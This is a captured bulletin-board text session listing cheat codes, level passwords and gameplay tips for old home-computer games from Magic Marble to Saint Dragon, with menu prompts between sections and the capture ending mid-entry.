+Game Cheats> 12 + +Magic Marble +------------------------------------------------------------------------------ + Level 01 - Advertiser + Level 02 - Everywhere + Level 03 - Toothpaste + Level 04 - Connection + Level 05 - Cleverness + Level 06 - Copywriter + Level 07 - Television + Level 08 - Cigarettes + Level 09 - Complicate + Level 10 - Impossible + Level 11 - Interested + + + + +Major Motion +------------------------------------------------------------------------------ +More[n,Y,=] Using both the mouse and the joystick at the same time will give you more +power for ramming other vehicles. + + + +Manchester United +------------------------------------------------------------------------------ +If you're losing a game whilst playing, simply press the appropriate +key/button to start a two player game and the other team should freeze letting +you win kinda easily, I should hope. + + + +Maniac Miner +------------------------------------------------------------------------------ +Pause using SPACE and press the * on keypad. Unpause and you got 9 lives, do +it as you need, like when you get low of course. + + + +Marble Madness +------------------------------------------------------------------------------ +Stay right where you start. + + + +Master Ninja +------------------------------------------------------------------------------ +On skill level screen hit SHIFT-H instead of choosing a level. You'll get 100 +of each weapon. + + + +Mean Streets +------------------------------------------------------------------------------ + 4660 - Carl Lindsky John Klaus - 4650 + 4663 - San Francisco Bazil Mallory - 2713 + 6211 - David Pope Melba Wiedbush - 4122 + 5170 - Sonny Fletcher Stanford Demille - 3199 + 4920 - Delores Lightbody J. Saint Gideon - 3891 + 4650 - Frank Schimming Tom Griffith - 4590 + 4610 - Arnold Dweeb Carl's Warehouse - 4675 + 3720 - Cal Davis (Dead) Aaron Sternwood - 0439 + 3614 - Amiley Monroe Big Jim Slase - 5612 + 4603 - Lola Lovetoy Bus Locker (rrok) - 5194 + 4550 - Alcatraz Ron Morgan - 1998 + 6470 - Ron's Beach House Jorge Valdez - 4931 + 4577 - Brenda Perry Greg Call - 4753 + 9932 - Bosworth Clark Della Lang - 2111 + 0021 - Sam Jones Wanda Peck - 4621 + 5037 - Law & Order Offices + + + +Mega-Ball +------------------------------------------------------------------------------ +On any level hit RIGHT-AMIGA P for invincibility. + + + +Megalomania +------------------------------------------------------------------------------ +Epoch 1 - IVIAZXFIWMB +Epoch 2 - UNNDJHGAZSJ +Epoch 3 - MKIAVZLXXSJ +Epoch 4 - KPIANBSXXSF +Epoch 5 - OMDAXUFERTD +Epoch 6 - OJXALURUFCX +Epoch 7 - SGSAVNFBZCB +Epoch 8 - OXNAVLLXWVV +Epoch 9 - QBKBTGFOLEN + + + +Megatraveler I +------------------------------------------------------------------------------ +A quick tip to gain cash. Find a High Tech world with a low law level and buy +as many PGMP's as possible, although this may only be one initially. Then go +to a lower Tech, higher law level world and sell the merchandise. The ideal +pleanets are: LLUN/EFATE (when using the trader character on the disk you can +purchase a PGMP for 130500 credits) and STUR/EFATE (where not only is there +a PGMP lying on the floor nesar the Gun shop, but they can be sold for 244500 +credits). In no time at all and with a little cost (because you are staying +within the system) you will gain riches untold! + + + +Menace +------m-$--------------------------------------------------------------------- +The code for a large supply of shields is XR31TURBONUTTERBASTARD. This code +should probably typed while playing, but you can type it anywhere, not that +it is likely to work. In fact, it is very unlikely it will work at all for +any reason unless it is typed during play. + +The code for level skipping is XR31 TURBO NUTTER BASTARD then press any key +from 1-6 to skip to the corresponding level. Alos you may press RETURN to +call upon extra weapons. + + + +Mercenary - The Second City +------------------------------------------------------------------------------ +Fly the dominion dart as usual, fly to above 350 metres, level off (your speed +should be 1,781 kph) and fire a missile. Pick the missile up once you get +close to it and then land. Go to 08,08, take the crashed intergalactic craft +and go to 08,06, go underground exit your ship and walk throuth the triangular +door - bingo, you now have access to the authors cheat room where you'll get +keys to every door, passes out of prison and the ability to carry oodles of +goodies in your pockets! + + + +Metal Masters +------------------------------------------------------------------------------ +You may press the F4 key to turn off the enemies automatic mode so that he +will be unable to move. You can now move forward and kick the hell out of the +hunk of scrap metal with no worries as to yourself. + + + +Mickey Mouse +------------------------------------------------------------------------------ +Activation of the cheat mode is as easy as typing 61315688 then pressing these +keys for various cheats: + + F2 - Opens a door to the next sub-game + F3 - Starts a fight between you and a witch + F4 - Refills your water pistol + + + +Midnight Resistance +------------------------------------------------------------------------------ +While the game is running on demo mode, type ITS EASY WHEN YOU KNOW HOW and +you start the game with infinite lifes. + + + +Midwinter +------------------------------------------------------------------------------ +Don't bother with the tedious procedures of recruitment, just head straight +for enemy HQ with some dynamite and introduce them to Mr. Big Explosion. +Also if you start every game by clicking the mouse in exactly the same place +on the START screen, every game will be set up identically. + + + +Might & Magic II +------------------------------------------------------------------------------ +To earn lots of experience make a backup of your original play disk. Now boot +and insert the disk that contains your characters. Save them onto your second +backup by going to the inn. Buy three tickets and try to win in all three +arenas. Remember to save after each victory. Once you have a victory in each +arena, go to the castle where the bishop is held captive. Before entering +flick the write protect tab to protect your disk. Then enter and free the +bishop with the correct key. He will give you experience if you have won +three fights of the same color. Exit and go to town. Open write protect tab +and save at the inn. You can repeat as often as you like. + + + + +Monty Python +------------------------------------------------------------------------------ +On the high scores screen you need to type SEMIPRINI to continue on with the +same level. + + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 13 + +NARC +------------------------------------------------------------------------------ +As you start the game go right until the first dustbin appears. Kneel down +in front of it and keep shooting. It will soon turn blue as the cheat mode +is activated. Infinites all around. + + + +Narco Police +------------------------------------------------------------------------------ + MUNICION - Ammo increase by 200 + NOAMETZ# - Turn off machine guns in sector # (you fill that in) + NOCAMZ# - Turn back on the machine gunes in sector # + NOENEMIG - Kill off enemies + COMENZAR - Bring the enemies back to life + ABRIR - Open any door + + + +Navy Moves +------------------------------------------------------------------------------ +786169 takes you to part two of the game. + +PART 1: + Move back slightly when you encounter a mine. They're much less + sensitive from the rear. + + Avoid jetski bullets by jumping or ducking. + + When approaching sharks, move the up and down nut left and right. + + Octopi and sea monsters are easily thwarted by holding down + fire until both missiles are ignited and then releasing. + + Struggle to dock with a submarine? Put a mini-sub in the gap between + the tailfin and the hull, face the left of the screen and move + upwards slowly, the computer takes over the docking procedure for you. + +PART 2: + The code is 948411. + + Arrows indicate the direction of the lifts. + + Kill white marines and flamethrower troops to get more ammo. + Stand over the body and search thoroughly. + + To get the code of an official, you must shoot him with a gun, + not a flamethrower. + + To enter computer codes, stand by a terminal, push up and + you'll be asked for a code. Two of the codes are: + + Transmit message: 1st or 2nd transmission official + Open door: 1st or 2nd machine official + + To open the reactor door, use the terminal next to the reactor. The + computer confirms the bomb is planted. Go out, use the game terminal + you used to open the door and transmit the following: OABERYAMD. Now + type END at the ready prompt and run like hell to the conning tower. + + + +Navy Seals +------------------------------------------------------------------------------ +Play until you get a high enough score to get your name onto the high-score +table, then enter your name as PSBOYS. Start the game again and press H to +pause. Now you can press ESCAPE to skip to the next level. Any time you +want to jump onto the next stage, simply press H then ESCAPE. Still, if you +can't do the first stages, then skipping to the later ones may be even more +embarrassing, so be warned! + + + +Nebulus +------------------------------------------------------------------------------ +Type HELLOIAMJMP on the title screen. You will now have unlimited numbers of +Pogos, and you can also go to each of the eight unfinished towers via an +F-key. You can do the same with the second group by accepting the second +mission before typing in the password. + + + +Nevermind +------------------------------------------------------------------------------ +To activate the cheat that lets you skip to next level by clicking the right +mouse button, type 328GTS on the title page. + + 00 - MMMRHM 01 - AMMRHA 02 - HMMRHH 03 - VMMRHV + 04 - PMMRHP 05 - GMMRHG 06 - IMMRHI 07 - RMMRHR + 08 - MAMRHW 09 - AAMRHN 10 - HAMRHZ 11 - VAMRHT + 12 - HHMWHH 13 - GAMRHQ 14 - IAMRHB 15 - RAMRHF + 16 - MHWWHM 17 - AHMWHA 18 - HHMWHJ 19 - VHMWHV + 20 - PHMWHP 21 - GHMWHG 22 - IHMWHI 23 - RHMWHR + 24 - MVMWHW 25 - AVMWHN + + + +New Zealand Story +------------------------------------------------------------------------------ +Pause, press M. After you hear the laser type MOTHERFUCKENKIWIBASTARD for +unlimited lifes. Or FLUFFY KIWIS does the same thing. + +On level 2.4 stand at the entrance to the octopus room and fire to the right a +few times. A warp will take you to level 3.1. + +To access the cheat mode just press "TRY CHEATING" (including the space) keys +together while on the title screen. The border should turn grey and when you +start the game you have infinite kiwi's and the ability to skip levels by +pressing "<-". + +Anyone heard of the whirl-winds? They advance you levels. Near the end of +level 1.1 there are three large steps that you must climb to reach your +brother (sister?), who is in a cage. Stand at the left edge of the top step, +facing left and jump. But as you jump, fire. If your current weapon is +arrows, fire halfway up, but if your weapon is bombs, fire at the top of your +jump. A whirl-wind should appear after four hits, and it will take you to +level 1.4. + +In 1.4, you will be in a little box under some water. Go up and to the right, +and you come out in a small room with three boxes on the right hand side. Go +up these, and you will see 4 long spaces, the top one having an "N" and a "D" +in it. Go up to the top one, get the letters, stand in the centre of the +space, facing left, and fire. Yep, you guessed it, another whirl-wind. This +one takes you to level 2.4. + +Or on level 2.4 , stand at the entrance to the room where the giant octopus +is located and fire to the right several times. A warp will appear that will +take you to the beginning of level 3.1. + +On level 1, part 1, move to the area containing three men with boomerangs, +shoot them. Go to the top of the third platform, move to the left, jump and +fire five times. A whirlwind in a box will appear, if you enter it, you will +be transported to the end of the level. Then you can free Tiki's naughty +friend just by jumping. + +When you recch the ice whale, move to the right-hand side of the spikes, avoid +the crystals, and wait until he picks you up. Once inside the whale, you can +start shooting, but avoid the ice drops. + +Meeting the rock monster without bombs makes him difficult to pass. So +collect bombs, go to the highest platform and shoot him. Kill it by either +dodging the bullets and hitting it when the doors open, or by fireballs. + +The last boss you encounter is the balloon seal. He cant be killed, by blows +to the body, so you must hit the balloon. Be careful for the balloon seal is +armed with a cannon and shoots cannon balls at Tiki. + +The town names are: + + AUCKLAND, ROTORUA, WAITOMO CAVES, STRAIT COOK, and MT COOK. + + + +Neuromancer +------------------------------------------------------------------------------ +When you first begin, sell all your body parts. You can get along just fine +without them for now, and it gives you enough to get a half way decent deck. +You will eventually need to buy them back before you start entering +cyber-space, or you will be killed easily. + + + +New York Warriors +------------------------------------------------------------------------------ +Stay all the way to the right on level 4 to reach the subway without much +trouble. + + + +Nightbreed +------------------------------------------------------------------------------ +Rather than ripping your hair during the encounter with Peloquin, just switch +your joystick to autofire, sit back and wait for the next scene to pop up. + + + +Nightshift +------------------------------------------------------------------------------ + Level 02 - Cherry, Banana, Banana, Lemon + 03 - Banana, Cherry, Pineapple, Plum + 04 - Pineapple, Lemon, Pineapple, Pineapple + 05 - Pineapple, Pineapple, Lemon, Cherry + 06 - Cherry, Plum, Plum, Pineapple + 08 - Pineapple, Banana, Pineapple, Cherry + 09 - Pineapple, Lemon, Lemon, Cherry + 10 - Lemom, Banana, Plum, Plum + + + +Ninja Mission +------------------------------------------------------------------------------ +While playing, on entering a room, push the joystick in the direction of the +enemy and hold the fire button. This will freeze them, making them a lot +easier to beat up. + + + +Ninja Spirit +------------------------------------------------------------------------------ +Press F9 then CAPS key then LEFT-SHIFT. The game will continue with an +unlimited supply of ninja. If this fails to work try hitting CTRL before +SHIFT. + + + +Ninja Warriors +------------------------------------------------------------------------------ +There are many fun things to do in this game besides play it, here are some +of them, but first press the CAPS key before typing them, then after typing +them press the CAPS key again: + + THE TERMINATOR - Ninja body parts explode when you die + MONTY PTHON - Enemies walk backwards + SKIPPY - Enemies bounce + A SMALL STEP FOR MAN - Moon gravity + STEVE AUSTIN - Press S during play toggles slow motion + on/off + MAY THE FORCE BE WITH YOU - Infinite stamina + WARP FACTOR ONE MR SULU - Level skips (keys 1-6) + CHEDDAR - Unlimited credits + GENESIS OF DALEKS - Photo negative screen mode + +It may be that you need to press ALT while typing these. + + + +Nitro +------------------------------------------------------------------------------ +To have lots of fuel from the very start of things type MAJ for your name. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 14 + +Oops Up +------------------------------------------------------------------------------ +The code for the last level is 4799. + +The rest of the codes are: + + PO01,DK51,30FJ,FL59,Q058,FA20,5F6J,CKD4,NF05,D04G,40V8,FDL0,V03D,49F8, + WAQD,XO38,UU09,40FJ,X03C,X03C,DK49,G8LD,P49X,A0A5,39VS,XPE4,FE5C,CXE5, + 32H4,PD30,10F4,D947,FD4G,DK48,206G,DK39,DGLO,D049,6P05,FO49,4G7H,XPE5, + UP9F,AQ1Q,S046,VE96,X94B,E114,D824,84DS,S04L,FOR0,2FF7,R4KG,39GH,PW04, + OEP5,R4G6,MF03,OW75,MC90,0OTB,TI27,W3RE,905W,TRP2,6GI3,REWQ,IPOU,HGF6, + FUC0,30RT,JUEE,MIRO,GULU,JUG8,R2T7,TUP8,KOP9,BIWI,EB01,SA3A,S4A9,LA8D, + MUE0,ER7E,NEPT,W8GA,PI31,2I10,A234,X3Q1,NEC1,GUF7,A3K9,C5J0,JH90,JUBI, + V069,T800,4799. + + + +Operation Wolf +------------------------------------------------------------------------------ +More[n,Y,=] At the end of a level, between the time when you kill the last bastard and +the time appears, rolling the mouse down causes damage to decrease. + +For the most accurate shot possible, pause the game with F1, position your +crosshairs over the selected enemy, unpause the game, click the button and +blast him to hell. + + + +Operation Thunderbolt +------------------------------------------------------------------------------ +You should get a score of at least 50,000 (good luck!) and on the high scores +table enter your name as WIGAN NINJA. Now hit F7 to skip about the levels. + +But level skipping probably won't help without infinite lives, so type your +name as EDOM TAEHC instead and that's what you have. + +If the game isn't quite tough enough, perhaps typing SPECCY MODE into the +high score table will provide more challenge, doubling the amount of +enemies. + +On the title screen you should press F8 and hit the fire button at the same +time for laser sights, but on 2 player games hit F2 instead instead of F8. + + + +Overlander +------------------------------------------------------------------------------ +Just a few tips - When cruising the highway don't stop shooting, and always +choose the highest paid mission. Buy fuel carefully - only enough for that +level, after level 1 you MUST buy a leanburner. Try to stay in the middle of +the road and travel fast, travelling slowly only burns more fuel. Fire bombs +are more useful than smart bombs when you learn how to use them. +Bulletproofing is necessary after level 2. When travelling through the +barriers the best speed is 90-120mph. + + + +Outrun +------------------------------------------------------------------------------ +Type RED BARCHETTA to activate the cheat mode then: + + T - 10 extra seconds + S - Skip Level + B - Restart same level + + + +P47 +------------------------------------------------------------------------------ +Type ZEBEDEE on the high score page then press F1 to skip levels and F2 for +more and more lives. + + + +Pacland +------------------------------------------------------------------------------ +When the title screen appears, type AVALON. It should flash indicating +you now have unlimited lives! If that doesn't work, try the following: + +Start a 2 player game. Make it as far as you can with player 1. +With player 2, you must be able to make it as far as the fairy to collect +your boots. Now that you have gotten your boots, you are going backwards to +where you started. Push the THIRD cactus on the way back, and a yellow +pacman will appear. Get it, now kill player 2. Continue playing with +player 1. Every time player 1 dies, get the yellow pacman with player 2 and +kill player 2 immediately. As long as you keep getting the yellow pacman +with player 2, player 1 will never die. + +Hints: + +Level 1 - Run to the third fire hydrant, and when you get there, jump over + it and push it to the left. This will give you a blue hat that + will make you invulnerable to the little ghosts that fall from + planes. + +Level 2 - Run to the third cactus, and push it to the left. You will now be + invulnerable for the entire level! + +Level 3 - After getting your magic boots, push the third cactus on the way + back for a free life. + +- Jump on the roof of ghost's car to escape +- Only use powerpills when ghosts are in range, or else it is wasted +- When you reach the breaktime sign, jump when you are about 1 inch away + for a bonus (depending how high you are when the level ends) + + + +Pandora +------------------------------------------------------------------------------ + 1: Wait a few moments for amy to appear. + 2: Take ID Amy and find the Second Officer. Pick up the Lazer Rifle + from the table next to him. + 3: Put Lazer Rifle into backpack-don't use it yet. + 4: Find the Engineer, take his ID and the Sonic Driver. + 5: Find the Lt Commander, take his ID and carry it. + 6: Find the Commander, take his ID and carry it. Also take the Code + Blue and Code Scarlet. + 7: Find the Captain, take his SDI disk and leave the ID Lt.Commander + 8: Shoot the Ice Lord with the Lazer Rifle. + 9: Carry the ID Engineer to go through the force field. + 10: Find the AWOL officer and take his ID. + 11: Carry the Sonic Driver and head for the Robomechanic. + 12: Swap the Sonic Driver for the Code Ochre. + 13: Carry the SDI Disk and go to the SDI computer. + 14: Give the SDI computer these items in the following order: + SDI Disk, Code Scarlet, Code Ochre and Code Blue. + 15: Carry the Engineer's ID and exit the Engineering Section. Then + swith to ID AWOL. + 16: Go the transporter and enter along the arrow. + 17: That's all folks. + + + +Pang +------------------------------------------------------------------------------ +At the map type WHAT A NICE CHEAT, so then the map should change purple, now +you can select what level you want to start at, be quick. + + + +Paradroid +------------------------------------------------------------------------------ +Hit F3 on the title page for an options screen. + + + +Pegasus +------------------------------------------------------------------------------ +THERE are only four codes! + + levels +1. SCREECH 10-19 +2. DRAGONFLY 20-29 +3. BEEBOP 30-39 +4. CELESTIAL 40-49 + +THE energy is at $1a008 +the lives is at $1a002 + + + +Peter Beardsley's International Soccer +------------------------------------------------------------------------------ +Continual tapping of the fire button while in possession of the ball prevents +any other players from tackling. + + + +Pipeline +------------------------------------------------------------------------------ +The codes are FOLD, EYES, EGGS, TEAR, PEAS, DUCT, & PODS. + + + +Pipemania +------------------------------------------------------------------------------ +The passwords are GRIP, TICK, DUCK, OOZE, BLOB, BALL, & WILD. + + + +Pirates +------------------------------------------------------------------------------ +When fighting against unbelievable odds dont panic. Choose the longsword. +Keep using the slash-high attack to cause the most dammage. You may get down +to only one man left, but you can still defeat the enemy captain. After you +win, select Send A Prize Crew so you will have enough people to sail your +ship. + +Don't attack a nation your home country is allied with, it will upset both of +them. + +Don't wed till you've got all your promotions, your oppurtunities will be much +better. Make conversation with all the Governors daughters, however, they +might gather important information for you from the Governors mansion. + + + +Platoon +------------------------------------------------------------------------------ +Type HAMBURGER on the title page. The word CHEAT will appear below the +credits. Press your fire button, then F5 when the jungle screen comes up. +You are now invulnerable. From here: + + F1 - Starts where you are + F2 - Puts you at the location of the explosives + F3 - Takes you to the bridges + F4 - Takes you to the village (now vulnerable again) + + + +Plauge +------------------------------------------------------------------------------ +Get a score ending in a 3, then hit the P key and then ESC. Click on 'no' +when asked to play again. This takes you to the title screen with the picture +of the drooling barbarian with the gun. Now type: + +KOM JE ILLEGAAL DOOR DE PLAAG DAN GRIJPT DE JUNGLE COMMAND JE IN DE KRAAG + +and hit RETURN. The border should turn green. Hit the fire button to return +to the game and you will now have infinite lives. Do all this on the first +level before you are killed for the first time. + + + +Pool of Radiance +------------------------------------------------------------------------------ +Once you find any item you can make as many copies of it as you want. + + 1 - Create a dummy character. + 2 - Load a saved game and transfer all the good items to the dummy. + 3 - Remove the dummy character from the party. + 4 - Load the dummy character back in. + 5 - Transfer the items to other members. + 6 - Drop the dummy character from the party. + 7 - Repeat steps 4-6 as many times as needed. + + +Populous +------------------------------------------------------------------------------ +Enter KILLUSPAL on the title page to warp to level 999. + + + +Powerdrift +------------------------------------------------------------------------------ +Select any course except D and win all the races, you must get the gold medal. +Collect all the gold medals and you enter a bonus round on a secret course +with you in control of the F-14 Tomcat from Afterburnner. With no collision +detection. Do the same thing on course D and you will be in control of the +Super Hang-On bike. + + + +Power, The +------------------------------------------------------------------------------ + Level Code Level Code Level Code Level Code + ------------ ------------ ------------ ------------ + 2 - LEVEL2 3 - VISUAL 4 - COWBOY 5 - URGENT + 6 - OOPSUP 7 - TOPTEN 8 - D14DH7 9 - ASDFGH + 10 - SOLONG 11 - SURFIN 12 - RACKET 13 - BULLIT + 14 - QRAZZY 15 - 36F6FR 16 - UNLINK 17 - PIXXEL + 18 - EUROPE 19 - NEWTON 20 - FREEZE 21 - LAUNCH + 22 - M7MS49 23 - GALVAN 24 - KLOWWM 25 - INDIGO + 26 - JINGLE 27 - JOGGER 28 - INSIDE 29 - 5P25PS + 30 - KNIGHT 31 - HINOON 32 - NOBODY 33 - GOODIE + 34 - OQZAYB 35 - ELTRIC 36 - 187293 37 - QROVVY + 38 - DOUBLE 39 - ROLLER 40 - CLOSET 41 - SLOWLY + 42 - BISNEZ 43 - 124816 44 - TARGET 45 - ANZING + 46 - VOHDOH 47 - Z97531 48 - WOODIS 49 - Y2X3W5 + 50 - XUQZOX + +There are more than 50 levels, but there are no more level codes! + + + +Powermonger +------------------------------------------------------------------------------ +These aren't really cheats, but some things the manual was rather unclear +about or didn't mention at all. First of all, when inventing, it is often +helpful to zoom in all the way on the towns (or anywhere for that matter). +It makes things go faster, and your inventions will be done sooner. Also, in +order to get a captain on your side, find a town with a captain in it. He'll +be the guy in the cape, usually standing in the middle of town. Next, set +your aggression level to Passive. Then go and attack the town. Make sure you +can beat them first! If you attack on Passive, your men don't kill anyone, +but rather forcibly coerce them into joining your side. If you win, you will +get everyone in the town on your side, including the captain. + + + +PPHammer +------------------------------------------------------------------------------ + 01: NO PASSY 02: TCJHHTCE 03: ABGHBSUE 04: DWWGDJTD + 05: WVJFUICC 06: SUGFWHUC 07: ASWERFTB 08: ERTDTEHA + 09: AJFCGDVA 10: THCDIBIW 11: AGSDCAHW 12: EFIADWCV + 13: BDBBVUJU 14: UCVBATEU 15: BBGVRSDT 16: FADWTRVS + 17: AVUAGIFS 18: TURSIHBR 19: BTDSDGAR 20: FRARFESJ + 21: BJJUWDCI 22: UIGUBCUI 23: BGWTSATH 24: FFTHTWHG + 25: REFHSVVG 26: RCCHFTJF 27: CBSHHSIF 28: CAIIBRDE + 29: JVBJDIRD 30: JUVJUHFD 31: CTICAGDC 32: CRBDRERB + 33: RJUDTDFB 34: RIGWGCEA 35: CHDWIBWA 36: CFTVBWFW + 37: SERFEVAV 38: SDDFVUWU 39: DBAEASRU 40: DAJDRRBT + 41: RWGDTJTT 42: RUWDGHSS 43: DTTDJGGS 44: DSFIDFVR + 45: SJCJFDJJ 46: SISJWCIJ 47: DHIGBBDI 48: DFBHRWRH + 49: TEVHJVFH 50: ADHTSUEG 51: ECESFTWG 52: AAURHRGF + 53: SWRUBJBE 54: WVDUDIAE 55: ETATVGSD 56: ASJWAFBC + 57: TRCWREAC 58: AIWVTCSB 59: EHIWGBCB 60: AGGAIAUA + 61: UEWBCVSW 62: BDTBEVGW 63: FCFCVTUV + + TO USE THIS CODES YOU MUST USE THE NAME: "TRITOON", THE CALCULATION + BECAUSE THE PASSWORD CALCULATIONS IS BASED ON THE NAME! (SMART GUYS) + * + + + +Predator +------------------------------------------------------------------------------ +F10 restores your energy. + + + +Predator II +------------------------------------------------------------------------------ +Start the game as normal and pause the action. Now type in YOU'RE ONE UGLY +MOTHER and restart the action. You should now be some kind os super-cop with +infinite energy. Maybe then you'll stand a better chance against the villains +and the nasty, scaly-skinned alien killer! + + + +Prehistorik +------------------------------------------------------------------------------ +After killing the strange turtle-like creature on the first level, you should +come to a screen with two carnivorous fish bouncing up and down in the water, +along with four banks. To get to the secret room don't jump over the first +well. Instead, jump inside it and fall down into the secret room! + +Later on the first level, look out for a ladder near some water which leads +up to a platform containing an egg. Climb the ladder and take the egg, then +go to the left into the water to find the submarine room. + +There is also a way to find some hidden extra food. Go to the third screen +of level three and jump forward hitting empty space. The hidden food should +now appear. + + + +Prince of Persia +------------------------------------------------------------------------------ +Skip levels using the key combination of either CAPS J or CAPS L, whichever +one works. + + + +Prophecy I - The Viking Child +------------------------------------------------------------------------------ +Here are the codes: + + DENIS - The forest + THE BLIZ - The bridge + SHARKMAN - The labyrinth + NYMHARSW - The desert + + + +Puffys Saga +------------------------------------------------------------------------------ +Pause the game when your health nears zero, then run your fingers along F1 +thru F7. You'll get 2000 healths, 4 keys, 4 Goms, and you'll be transported +to the next level. Also, if you have 2 Goms, you can call up a map of the +level by pressing the F6 and/or F7 keys. + +Press F5 and F6 together and you will be advanced to level 7. Press DEL to +goto level 8 press it again to go to level 9 + + + +Puzznic +------------------------------------------------------------------------------ +When playing the game, press the space bar to bring up the retry screen, but +don't release the spacebar. All the time that it is held down the game will +be paused and you can work out what to do without having to rush. + + Level 48 - ICHI MICH + 49 - IGAN BARO + 50 - PASS WORD + 51 - MINA SAMA + 52 - NO.O KAGE + 53 - DE.N ANTO + 54 - KASH IAGA + 55 - RIMA SITA + 56 - THAN KYOU + 57 - MAID OOKA + 58 - IAGE ITAD + 59 - AKIM ASHI + 60 - TEAR IGAT + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 15 + +Quadralien +------------------------------------------------------------------------------ +Access codes: level 1- 170961, level 2- 010655, level 3- 610169. + +And now, some tips: once in the core, you can't quit. So choose droids with +good lasers, Jack and Spud for example. The Quadralien mother is made up of +4 separate pieces grouped together and surrounded by Earthling boxes. The +mother can only be destroyed by blowing up each box from a different +direction. From the starting point there are three exits: north, east, and +west. Go east and destroy the first box, return to the starting point, and +go north to destroy the second box. You will now have both droids to blow +the remaining boxes. Go west through the one-way force field, and get the +other. Don't forget to keep recharging. + + + +R-Type +------------------------------------------------------------------------------ +Enter SUMITA at the high score screen for infinite lives. +More[n,Y,=] +Load the game; when you get the "insert disk 2 and press space" prompt, press +HELP and type ME, then press the up arrow (between INSERT and CLR HOME). Now +insert disk 2 and press space. While playing the game, you can become +impervious to collisions (F5), impervious to enemy fire (F6), get infinite +credits (F7), and put the orb in the control of a second player with a stick +plugged in the mouse port (F8). Neat! + + + +Rainbow Islands +------------------------------------------------------------------------------ +We all know that collecting the seven different-colored gems gives you an +extra life and a 100,000 Bonus Gem once the Boss is defeated. But collecting +all of the gems in the correct order of color (from left to right on the gem +counter) not only awards you the life and Bonus Gem, it also grants you access +to a magical secret room. When you reach the end of the level, a silver door +appears. `You don't have to fight the Boss. (Hint A) + +Even more useful is how to create any color gem. The screen is split into +several invisible vertical stripes of color. When a gem falls, its color is +determined by the `color' of the area into which it fell. Now all you have to +do is guage carefully where the dead enemy will fall to create the gem color +of your choice. (Hint B ) + + Type these codes on the title page: + BLRBJSBJ - Fast Feet + RJSBJSBR - Double Rainbows + SSSLLRRS - Faster Rainbows + BJBJBJRS - Displays hint + LJLSLBLS - Displays another nint + SJBLRJSR - Unknown + LBSJRLJL - Continue on all rounds + + + +Rally Cross +------------------------------------------------------------------------------ +As the game starts, follow the railway track and the screen will go blan. Now +you will find yourself with 24 tokens with which you can equip your car with +just about anything. + + + +Raider +------------------------------------------------------------------------------ +Level Codes: SHOT DYKE HIGH LINK PEAR KILN BAND + + + +Rambo III +------------------------------------------------------------------------------ +Get on the high-score list and type RENEGADE. Pressing 1,2 and 3 will drop +you on the level of your choice. And now for some tips: + + 1) When inside the 2nd building, wear your IR goggles. + 2) Don't walk in front of soldiers, since it will trigger an + alarm and about 8 soldiers will jump you! + 3) If you enter a dark room, use the glow tube. + 4) Never use a gun without a silencer. + 5) Turn off the electric door with switch located several + rooms away. + 6) The mine detector won't work without the generator. + 7) The IR goggles won't work without a battery. + 8) Watch out for IR beams, since they also trigger alarms. + +Here's a list of items you can find: + +arrows, silencer, first aid kit, IR goggles, glow tube, battery, key, mine, +detector (in 2 pieces), pistol, ammo, rubber gloves (you never know when you +can be expected to perform major surgery!!!) + + + +Retaliator +------------------------------------------------------------------------------ +Enter your name as THE DIDY MEN. Click on the Colonel icon and press RETURN. +Select the battle area as normal and select mission control. Accept a mission +without selecting one. Now play the game as normal. Tap the RETURN key to +land without crashing. For infinite weapons use the name CIARAN. + + + +Return of the Jedi +------------------------------------------------------------------------------ +At the high score table type DARTH VADER now hit F2 to skip levels. + + + +Return to Genesis +------------------------------------------------------------------------------ +Type WASP.ASM on the title page and press F5 for invincibility. + + + +Revelation +------------------------------------------------------------------------------ +Level 10 `Sirens` +Level 20 `Loader` +Level 30 `Player` +Level 40 `Result` +Level 50 `Dollar` +Level 60 `Change` +Level 70 `Finger` + + + +Rick Dangerous +------------------------------------------------------------------------------ +Type POOKY at the high score screen to continue with the current level. + + + +Rings of Medusa +------------------------------------------------------------------------------ +After typing your name type DESOXYRIBONUXLEINSAEURE then press HELP. + + + +Rings of Zon +------------------------------------------------------------------------------ +On the games options screen press the LEFT AMIGA key to activate cheat mode, +then in the game use F9 and F10 to cheat. + + + + +Risky Woods +------------------------------------------------------------------------------ +F1 - for more lives +F2 - for more money +F3 - to skip to next level + + + +Roadblasters +------------------------------------------------------------------------------ +Type LAVILLASTRANGIATO on the starting line then: + + X - Spin Car + S - Skip Stage + P - Refuel + G - End Game + 1 - Mount UZ Cannon + 2 - Cruise Missles + 3 - Electro Shields + 4 - Nitro Injectors + 0 - Remove all weapons + + + +Robocop +------------------------------------------------------------------------------ +Pause and type BEST KEPT SECRET for invincibility. + + + +Robocop II +------------------------------------------------------------------------------ +Type SERIALINTERFACE and F9 for energy and F10 to skip levels. + + + +Rock N Roll +------------------------------------------------------------------------------ +Type RAINBOW ARTS for your name. To level warp enter: + +Level number, XX, followed by four digits when added together equal the level +number, XX, and then the level number reversed. + + Example: Level 12 Enter - 12 XX 3333 XX 21 + +To hear the sountrack type COUNTRY. + +Find the special hole on level 1. Its suronded by 3 left pointing arrows. +Fall down the hole, press the left mouse button. You have warped to level 33. + + + +Rock Star Ate My Hamster +------------------------------------------------------------------------------ +Simply type the word COLBOPS and now press F7 for an extra 100,000 pounds +cash. Pressing F8 will make your band play as well as it possibly can. +F9 will produce maximum crowds at your gigs. + + + +Rocket Ranger +------------------------------------------------------------------------------ +Rescue the professor as this slows down the nazis, they can't use him to +increase their efficiency. You will waste valuable time unless you rescue +him from the Zeppelin while he is over the Atlantic + +Shooting the gunner in the Gondola is tricky, the best method being shoot +below the gunner and move left and right until you are on target. Gradually +move up until you hit the Gondola. When you hit it there is a flash, stop +firing and after a few seconds you'll be inside the Gondola. + +Find the supply of Lunarium before the Fort Knox supply runs out, so +infiltrate the Nazi base which recieves Lunarium from the moon. It is in +South America or Africa, once infiltrated, your agent there will cary on +sending you Lunarium throughout the game. You will have to storm the Nazi +base first. + +NOTE: In a different magazine it recommends you don't waste time rescuing the +professor, as you will be always too late. Instead use the agents to find +rocket factories, and uranium depots. + + + +Rolling Thunder +------------------------------------------------------------------------------ +Type JIMBBBY for infinite energy. Hit I to change levels. + + + +Rotor +------------------------------------------------------------------------------ + Level 1 - GAG + Level 2 - LIP + Level 3 - FLY + Level 4 - MEN + Level 5 - AWE + Level 6 - TNT + PIT for the battle sim. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 16 + +Saint Dragon +------------------------------------------------------------------------------ + CAPS DECAFFEINATED RETURN for lives. + CAPS 